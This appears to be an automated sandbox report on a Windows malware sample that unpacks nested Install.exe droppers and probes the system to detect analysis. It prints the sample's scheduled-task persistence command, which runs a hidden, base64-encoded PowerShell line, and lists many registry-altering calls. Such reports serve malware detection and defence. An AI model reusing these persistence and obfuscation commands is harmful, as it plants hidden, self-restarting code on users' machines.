Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00411360 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00413954 push eax; ret
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00413CC0 push eax; ret
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF9A5642625 push eax; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00E4ECA2 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067D6020 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067D28EF push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_067DFFA0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D2780 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6780 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D47B2 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D87F0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D0710 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6580 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4550 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D2570 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA292 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA2B2 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA270 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D03B0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4301 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6351 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8370 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DA0D0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D21F0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8111 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068DE111 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6172 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D8EE0 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D4F90 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_068D6FD1 push es; ret
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.1.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exeFile created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gAhELFxgt" /SC once /ST 12:43:49 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 2463 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9454
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2463
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040553A FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Temp\7zS332F.tmp\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\
